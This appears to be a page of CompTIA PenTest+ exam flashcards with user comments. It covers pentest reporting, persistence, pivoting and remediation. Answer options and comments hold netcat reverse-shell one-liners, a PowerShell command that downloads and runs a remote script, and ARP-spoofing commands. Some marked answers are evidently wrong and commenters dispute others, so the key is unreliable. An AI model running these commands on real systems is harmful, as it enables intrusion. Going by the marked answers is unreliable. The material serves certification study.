Actual Exam Questions Flashcards
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
A. The latest vulnerability scan results
B. A list of sample application requests
C. An up-to-date list of possible exploits
D. A list of sample test accounts
B. A list of sample application requests
100%
A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)
A. Tcpdump
B. Nmap
C. Wireshark
D. SSH
E. Netcat
F. Cain and Abel
D. SSH
E. Netcat
100%
mr_robot
4 months ago
C and D - PenTest+ Practice Tests Book - SYBEX In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.
upvoted 3 times
A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?
A. Infrastructure is being replaced with similar hardware and software.
B. Systems administrators are applying the wrong patches.
C. The organization is not taking action to remediate identified findings.
D. The penetration testing tools were misconfigured.
C. The organization is not taking action to remediate identified findings.
100%
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?
A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
B. Connect to the SQL server using this information and change the password to one or two non-critical accounts to demonstrate a proof–of-concept to management.
C. Notify the development team of the discovery and suggest that input validation be implemented with a professional penetration testing company.
D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.
A. Document the findings with an executive summary, recommendations, and screenshots of the web application disclosure.
A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?
A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.
A. Enable HTTP Strict Transport Security
100%
D1960
5 months, 3 weeks ago
D. Sanitize invalid user input? Even if you enable HTTP Strict Transport Security, the application is still using basic authentication. The problem is with the application, not the communication channel. Basic authentication may not stop an sql injection.
upvoted 1 times
D1960
4 months, 2 weeks ago
I was wrong, the correct answer is A. https://en.wikipedia.org/wiki/Basic_access_authentication
upvoted 1 times
jon34thna
5 months, 2 weeks ago
SYBEX | Pentest Questions | Chapter 5 Reporting and Communication | Question 125 A. Enable HTTP Strict Transport Security
upvoted 1 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book A. - In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.
A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select
THREE).
A. Mandate all employees take security awareness training.
B. Implement two-factor authentication for remote access.
C. Install an intrusion prevention system.
D. Increase password complexity requirements.
E. Install a security information event monitoring solution.
F. Prevent members of the IT department from interactively logging in as administrators.
G. Upgrade the cipher suite used for the VPN solution.
A. Mandate all employees take security awareness training.
B. Implement two-factor authentication for remote access.
D. Increase password complexity requirements.
100%
A, C, G
A, D, G
Droid2000
11 months, 2 weeks ago
i think A should be included in ans
upvoted 4 times
AnAverageUser3656
9 months, 1 week ago
I agree with droid2000, “A” should be included and omit “G”. Improving employee education is a good way to mitigate phishing attacks.
upvoted 4 times
cooljane
8 months, 2 weeks ago
I believe correct answer are: A, D, G.
upvoted 2 times
phatboy
8 months, 1 week ago
It isn’t G, the cyphers are irrelevant, access was gained with phished credentials. The answer should definitely include B as this would have prevented access. I think the answer is either BDA or BDF.
upvoted 3 times
amankry
7 months, 3 weeks ago
A B D is the correct answer
upvoted 5 times
sharifengg
7 months, 3 weeks ago
A B D is the correct answer
upvoted 5 times
jon34thna
5 months, 2 weeks ago
SYBEX | PenTest+™ Practice Test | Chapter 5 | Reporting and Communication | Question 124 password complexity requirements. two-factor authentication for remote access. all employees take security awareness training. A | B | D
upvoted 3 times
mr_robot
3 months, 3 weeks ago
Actually the Sybex book states A | D | G. “In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that uses Transport Layer Security (TLS) or Secure Socket Layer (SSL). The set of algorithms that cipher suites usually contain includes a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.”
upvoted 1 times
mr_robot
1 month, 4 weeks ago
…but, I would go for A B D.
upvoted 1 times
ebot
1 month, 4 weeks ago
I would say ADG, Phishing requires employee awareness training, weak password would require increase complexity and the cipher suite needs to be upgraded. Should not be able to “easily” crack them. Possibly weak SSL or TLS . Source: Sybex page 163 & 166 “Insecure Ciper Use”
upvoted 1 times
mr_robot
1 month, 2 weeks ago
ADG seems to be the best even though MFA always go together using strong passwords but, once you use a complex password together with an AES 256-bit encryption for instance, it would be almost impossible to crack it. https://securitygladiators.com/vpn-encryption-guide/#Ciphers https://securityboulevard.com/2020/05/aes-encryption-a-closer-look-at-advanced-encryption-standards/
upvoted 1 times
kabwitte
1 month ago
I don’t think that upgrading the cipher suite would change anything because the attacker was successful using social engineering (Phishing). The level of security really doesn’t mean much if the attacker is able to con their way through with a little bit of charm. As a result, I would go with ABD like Boblee.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is A B D.
upvoted 1 times
Leonar
3 weeks, 1 day ago
People, Process, Technology. A - People B - Technology D - Process
During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
C. Promptly alert the client with details of the finding
100%
phatboy
10 months, 3 weeks ago
I believe the answer should be C
upvoted 3 times
amankry
7 months, 3 weeks ago
C is correct answer
upvoted 3 times
D1960
5 months, 3 weeks ago
If it’s a critical vulnerability, shouldn’t you disable the port right away? Maybe A is the correct answer?
upvoted 1 times
jon34thna
5 months, 2 weeks ago
‘C’ critical vunerability is a reason to stop pentest and call the client. Not A because you are not the Network Administartor
upvoted 4 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX C. - In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.
upvoted 2 times
maps7
3 months, 3 weeks ago
I will go with C coz as Penetester your job is to report your findings and let the administrator make decisions. Companies have the risk that they have accepted so it will be wise to promptly alert the administrator of your findings and then only them can make a decision
upvoted 3 times
Leonar
3 weeks, 1 day ago
Why don’t we cut off the powerline? :) The best answer is C
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
A. Selection of the appropriate set of security testing tools
100%
mr_robot
4 months, 1 week ago
Probably A?
upvoted 1 times
mr_robot
3 months, 3 weeks ago
https://resources.infosecinstitute.com/pentesting-ics-systems/#gref
upvoted 1 times
D1960
3 months ago
With the possible exception of PLCSCAN. None of those tools are unique to ICS. However, heath and safety issues at a powerplant would be unique.
upvoted 1 times
D1960
3 months, 1 week ago
Maybe C? Tools are always an issue. But a power plant has health and safety issues beyond that of a typical office.
upvoted 3 times
mr_robot
2 months, 1 week ago
I would agree with you. A selection of the appropriate set of security testing tools is already part of any pentesting assessment according to the type of company and test you need to do but, when asked “Which of the following is a consideration unique to such an environment”, means that the pentest has also to consider and assess a potential operational and safety hazards present onsite. http://www.fedco.co.id/vulnerability-assessment-and-penetration-testing-in-online-scada-ics-environment-webinar/
upvoted 2 times
boblee
1 month, 3 weeks ago
The answer is A. Because you would have to more research to find tools that can test that specific scada system.
upvoted 3 times
kabwitte
1 month ago
I’m going for A. Reason? A single TCP or UDP port scan against a SCADA component can cause catastrophic damage of mass proportion. Before testing SCADA systems, pentesters should know the proper tools to use to ensure the testing provides adequate coverage and reduces the likelihood of knocking over critical services. Nutting, Raymond. CompTIA PenTest+ Certification All-in-One Exam Guide (Exam PT0-001) (p. 83). McGraw-Hill Education. Kindle Edition.
upvoted 2 times
Leonar
3 weeks, 1 day ago
It is always human life in the first place. C !
A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the
BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?
A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.
B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.
C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX D. - Whitelisting testers in intrusion prevention systems (IPSs), web application firewalls (WAFs), and other security devices will allow them to perform their tests without being blocked. For a white box test, this means that testers won’t spend time waiting to be unblocked when security measures detect their efforts. Black box and red team tests are more likely to result in testers being blacklisted or blocked by security measures. In this scenario, the penetration tester should tell the client that testing should focus on the discovery of potential security issues through all in-scope systems and not just on determining the effectiveness of active defenses such as the IPS.
upvoted 2 times
Leonar
3 weeks, 1 day ago
D is okay, but the best rationale is to let them know that the threat actor is not the only outsiders but also insiders that could be whitelisted
A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).
A. Randomize local administrator credentials for each machine.
B. Disable remote logons for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX C, D and F - In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following: - Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. - Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack. - Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.
upvoted 3 times
maps7
3 months, 2 weeks ago
but F how does disk encryption stops an attacker from the lateral movement?
upvoted 1 times
mr_robot
1 month, 3 weeks ago
You are right. I guess E would be a better option even though you can easily bypass NAC by spoofing your MAC address with a deskphone for instace - https://resources.infosecinstitute.com/nac-hacking-bypassing-network-access-control/ But A seems to be a valid option too as “Microsoft’s Local Administrator Password solution (LAPS) can have drastic impact in the fight against lateral movement techniques. It is an effective way to prevent some potential lateral movement or privilege escalation within your environment.” https://blog.stealthbits.com/running-laps-in-the-race-to-security/ https://blog.stealthbits.com/3-zero-cost-tactics-make-difficult-attackers-move-laterally/ But it can also be bypassed just like any security defense: https://www.youtube.com/watch?v=vaov8F-0dQ8 Anyway I will stick with CDE.
upvoted 1 times
D1960
3 months, 2 weeks ago
Tough one. C & D for sure. But I am not sure if E or F is better. I think I will go with CDE. Encrypting a disk does not seem to address the problem that is presented - being able easily move from one host to another.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is CDE.
upvoted 1 times
kabwitte
1 month ago
I would go with C, D, G. I believe that the reason the attacker was able to move laterally without any obstacles is because all the hosts were on the same network. It takes more work to move laterally if these compromised hosts were on different networks. To accomplish such a task, a virtual LAN (VLAN) needs to be implemented. This would make each host look like they are on they own separate network. Thus, when the attacker compromises the initial host, the others won’t be readily available or seen.
upvoted 1 times
kabwitte
1 month ago
I think I have a change of heart on this one. I would go for CDE. Implementing a VLAN for each host in that ONE domain is a bit extreme for a recommendation. The easier approach would be additional network access controls which would apply to all hosts within that domain.
upvoted 1 times
Leonar
3 weeks, 1 day ago
G must be involved in as the top solution
Which of the following is the reason why a penetration tester would run the chkconfig –del servicename command at the end of an engagement?
A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence
A. To remove the persistence
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX A. chkconfig is a tool for managing which run levels a service will run at. chkconfig can be used to view or change the run level of a service. Using chkconfig –del will set the named service to not run at the current run level and will remove the persistence.
upvoted 5 times
noura_141
3 weeks, 2 days ago
Your comments are very helpful thank you
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ‘‘changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using “strings” to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
exit
setuid
strcmp
GLIBC_2.0 -
ENV_PATH -
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?
A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.
C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.
100%
phatboy
8 months, 1 week ago
How can the attacker run a command with sudo if they only have low-privilege access?
upvoted 1 times
Marshmallow
7 months, 1 week ago
The SUID is set for the write permission and that’s how the user can do SUDO.
upvoted 1 times
Evens_chokoe
5 months, 3 weeks ago
the attacker is running sudo just for Privilege escalation technique
upvoted 1 times
mr_robot
3 months, 3 weeks ago
I would go for D. - https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
upvoted 1 times
mr_robot
1 month, 2 weeks ago
The tester needs to create another dodgy copy of changepw script and move it to another directory (ex: \tmp) and not changepass initial executable. Export ENV_PATH to the chosen diretory of the dodgy script (ex:\temp) and then run changepass executable. “ChangePW is a freeware command line tool to set a password, display the current userAccountControl password flags, and enable or disable an account.” https://www.itprotoday.com/compute-engines/jsi-tip-9267-changepw-freeware-command-line-tool-set-password-display-current
upvoted 1 times
NoImDirtyDan
3 weeks, 2 days ago
C is what you are describing.
A malicious user wants to perform a MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20 -
NETMASK: 255.255.255.0 -
DEFAULT GATEWAY: 192.168.1.254 -
DHCP: 192.168.1.253 -
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
100%
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book - SYBEX B. - A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a manin- the-middle attack; it is done by performing arpspoof -t . The -t switch specifies a particular host to ARP poison.
upvoted 3 times
NoImDirtyDan
3 weeks, 4 days ago
Correct answer is D. You must use -r to capture traffic in both directions, creating a true MITM.
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
100%
zgwy
11 months, 2 weeks ago
Wrong…C and D http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
upvoted 2 times
D1960
5 months, 3 weeks ago
I also think the correct answers are C and D. According to this site: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ This should work: # nc 192.168.1.5 44444 -e /bin/sh Note that D is very similar: nc -e /bin/sh 192.168.1.5 44444 - A is probably wrong because no shell is executed - B is probably wrong because no IP is not specified - E is wrong because there is no 444444 port (too high a port) - F is wrong because the IP is 192.168.5.1 not 192.168.1.5
upvoted 2 times
deathfrom
3 months, 3 weeks ago
I think there are 3 correct answers here. B,C & D. B is needed to create a nc listener on the attackers machine. C will work when the -e option is not available on for nc. D work because the -e option is available. More than likely it will be C/D
upvoted 1 times
mr_robot
1 month, 2 weeks ago
The question asks two possible ways to gain a reverse shell back to the attacking machine at 192.168.1.5. So the correct answers would be C and D. You can use either one to gain a reverse shell. B (nc -nlvp 44444 -e /bin/sh) is just a listener from from the remote machine used for a bind shell. Bind Shell - have the listener running on the target and the attacker connect to the listener in order to gain a remote shell. nc -nvlp 5555 -e /bin/bash - setting up a listener from the remote machine nc -nv 192.168.10.10 5555 - use our machine to connect to it remotely Reverse Shell - have the listener running on the attacker and the target connecting to the attacker with a shell. nc -nvlp 5555 - setting up a listener from the attacker machine nc -nv 192.168.20.20 5555 -e /bin/bash - use the target machine to connect to our machine http://stuffjasondoes.com/2018/07/18/bind-shells-and-reverse-shells-with-netcat/ The thing is everywhere I see this question B and C are correct so what we need to do to pass the exam, trust our own instincts/experience or what Comptia believes is correct? Is it worth to pay for the Comptia CertMaster Practice in order to verify all those doubtful questions?
upvoted 1 times
boblee
1 month, 2 weeks ago
CertMaster does not have these questions. I have certmaster.
upvoted 1 times
NoImDirtyDan
4 weeks ago
The correct answers are C & D. Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run
B. net session server | dsquery -user | net use c$
C. powershell && set-executionpolicy unrestricted
D. reg save HKLM\System\CurrentControlSet\Services\Sv.reg
A. schtasks.exe /create/tr “powershell.exe” Sv.ps1 /run100%
phatboy
8 months ago
Correct answer is A. https://pentestlab.blog/2019/11/04/persistence-scheduled-tasks/
upvoted 3 times
mr_robot
4 months, 3 weeks ago
According to PenTest+ Practice Tests Book - SYBEX D. - reg save saves a copy of specified subkeys, entries, and values of the registry in a specified file. A file with the .reg file extension is a registration file used by the Windows Registry. These files can contain hives, keys, and values.
upvoted 1 times
D1960
3 months, 2 weeks ago
What good is saving the registry entries, if you cannot restore them? If you lose your access to the system, how do you restore your access by restoring part of the registry?
upvoted 1 times
mr_robot
3 months ago
I agree with you however the command from schtasks is incomplete. For the attacker to maintain persistence during logon he would need to add the /sc onlogon switch to the command: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ For that reason, I think D would not the the best answer but the least incorrect: https://rasor.wordpress.com/2013/08/12/powershell-scheduling-a-task/ “HKLM\System\CurrentControlSet\services The keys located here get loaded by the Service Controller at various times during the operation of the computer. Some are loaded at system startup and others are loaded on demand or when triggered by other events. The attackers want to load at startup so that even if no user logs in they can connect to the computer.”
upvoted 1 times
mr_robot
1 month, 3 weeks ago
Also, once you modify the registry you can add a dodgy service to be started at logon and maintain persistence to the device: https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services.html https://threatvector.cylance.com/en_us/home/windows-registry-persistence-part-2-the-run-keys-and-search-order.html
upvoted 1 times
mr_robot
1 month, 1 week ago
Best answer is A. You have to use “reg add” instead of “reg save” in order to add a new subkey or entry to the registry.
upvoted 2 times
khuno
4 weeks, 1 day ago
Examples reg add \ABC\HKLM\Software\MyCo reg save HKLM\Software\MyCo\MyApp AppBkUp.hiv
upvoted 1 times
merdoso
3 months, 2 weeks ago
Strange— agree about A. The issue is that you could get persistance with both… but reg key like this is strange.
upvoted 1 times
DaDude
3 months, 2 weeks ago
The schtasks is not complete, /run - this is an on demand (you would need to be on the machine to run this) if you lost connection you would not be able to run this again
upvoted 1 times
D1960
2 months ago
But maybe you would not have to run it again? It depends on what the powershell script does.
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is A in this context. SYBEX is bad.
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
A. set rhost 192.168.1.10
B. run autoroute -s 192.168.1.0/24
C. db_nmap -iL /tmp/privatehosts.txt
D. use auxiliary/server/socks4a
D. use auxiliary/server/socks4a
100%
D1960
4 months, 2 weeks ago
Maybe: B. run autoroute -s 192.168.1.0/24 ? Reference: https://www.offensive-security.com/metasploit-unleashed/Pivoting/
upvoted 1 times
mr_robot
2 months, 3 weeks ago
Agree with you. “Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet” - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md run autoroute -s 192.168.1.0/24 - Add a route to 192.168.1.0/24 (establish a Meterpreter session on the victim machine - https://www.offensive-security.com/metasploit-unleashed/Pivoting/ use auxiliary/server/socks4a - Setup and run a socks proxy over meterpreter, this module provides a socks4a proxy server that uses the builtin Metasploit routing to relay connections. - https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ https://nullsweep.com/pivot-cheatsheet-for-pentesters/ set rhost 192.168.1.10 - Set the target address db_nmap -iL /tmp/privatehosts.txt - Use nmap and place results in database
upvoted 1 times
kabwitte
4 weeks, 1 day ago
Yup, I believe you are correct sir! The link you provided actually gives the answer. :)
upvoted 1 times
mr_robot
4 months, 2 weeks ago
PenTest+ Practice Tests Book - SYBEX D. Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet.
upvoted 4 times
mr_robot
2 months, 3 weeks ago
Don’t think this is right. Probably A is correct. - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md
upvoted 1 times
khuno
1 month, 3 weeks ago
It will be socks4a that will create a session through the internet. (the question says access the network.) It will not be autoroute because that will help you pivot to another computer in the network. Meaning you are already in.
upvoted 2 times
kabwitte
4 weeks, 1 day ago
I would go with B: Preparing to pivot across a network requires us to first establish a Meterpreter session on the victim machine. From there, we can use the autoroute script to enable access to the non-routable subnet: meterpreter > run autoroute -s 10.0.0.0/24 Note: An non-routable address is a private network address. Non-routable: https://docs.actian.com/dataconnect/11.1/index.html#page/User/Non-routable_Addresses.htm
upvoted 1 times
kabwitte
4 weeks, 1 day ago
Sorry, I missed a source for the autoroute script: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/server/socks4a.md
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
A. Randomize the credentials used to log in.
B. Install host-based intrusion detection.
C. Implement input normalization.
D. Perform system hardening.
D. Perform system hardening.
D1960
5 months, 3 weeks ago
This is an attack on an application, not a host. There might be some sort of host hardening that would help, maybe a WAF? But I cannot help but wonder if C is a better answer? I think input normalization would sanitize the input, which would prevent an SQL injection.
upvoted 2 times
jon34thna
5 months, 2 weeks ago
Yep difficult call here. But I think D is correct. If ‘C’ used the word Sanitization or Parameterized query I may be tempted but ‘Normalization’ ….? I would stick with D.
upvoted 1 times
mr_robot
4 months, 1 week ago
PenTest+ Practice Tests Book D. - System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: Application hardening Operating system hardening Server hardening Database hardening Network hardening
upvoted 2 times
mr_robot
2 months ago
It seems Input Validation and Sanitisation are the first line of defense against SQL injections, even though Parameterised queries are better but in this scenario I think “the BEST recommendation” would be to do system hardening. “The risks associated with code injections are escalated when the databases or operating system tied to the Web applications under attack are weak due to poor patching and configuration. In addition, the system administrator should be responsible for hardening the underlying database and the operating system by disabling unnecessary services and functionality.” https://wikisites.cityu.edu.hk/sites/netcomp/articles/Pages/Hardening%20Steps%20to%20Mitigate%20Code%20Injection.aspx https://resources.infosecinstitute.com/sql-injection-protection-cloud-systems/
upvoted 1 times
boblee
1 month, 3 weeks ago
The answer is C.
upvoted 2 times
khuno
4 weeks, 1 day ago
https://www.essentialsql.com/get-ready-to-learn-sql-database-normalization-explained-in-simple-english/ Normalization is all about avoiding redundancy. “There are three main reasons to normalize a database. The first is to minimize duplicate data, the second is to minimize or avoid data modification issues, and the third is to simplify queries. “ I’ll go for D.
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?
A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal
B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”
D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000
A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal
100%
xxdxx
6 months, 1 week ago
When I tried these commands, only B worked successfully
upvoted 3 times
jon34thna
5 months, 2 weeks ago
I don’t think A. serveral tests and I think it is B or D
upvoted 1 times
GOKU1984
4 months, 4 weeks ago
B .. Is the only work that worked …D brought up an x term window of the of the same terminal you were trying from.
upvoted 1 times
mr_robot
4 months, 1 week ago
Which Linux distro did you guys test the commands from B? I used the latest Kali but could not make it work. I got connection refused even though I had enabled SSH.
upvoted 1 times
D1960
3 months, 1 week ago
According to ssh man pages: -L [bind_address:]port:host:hostport : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side. -X : Enables X11 forwarding
upvoted 1 times
mr_robot
1 month, 4 weeks ago
Another example for B: https://www.howtogeek.com/168145/how-to-use-ssh-tunneling/ https://explainshell.com/explain?cmd=ssh+-L4444%3A127.0.0.1%3A6000+-X+user%4010.0.0.20+xterm Commands from A seem incomplete: https://www.lifewire.com/linux-command-xhost-4093456
upvoted 1 times
khuno
1 month, 3 weeks ago
isn’t the key here is “graphic console window”. the other options are terminal only?
upvoted 1 times
khuno
4 weeks, 1 day ago
never mind, got confused with gui
upvoted 1 times
khuno
4 weeks, 1 day ago
I will go with D, just because the local IP on B is wrong
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
B. Setting a schedule of testing access times
100%
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company.com; OU=hq CN=users”
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
D. dsquery -o -rdn -limit 21
100%
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG
C. HKEY_CURRENT_USER
100%
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
100%
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
100%
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.
B. Execute a remote script.
100%
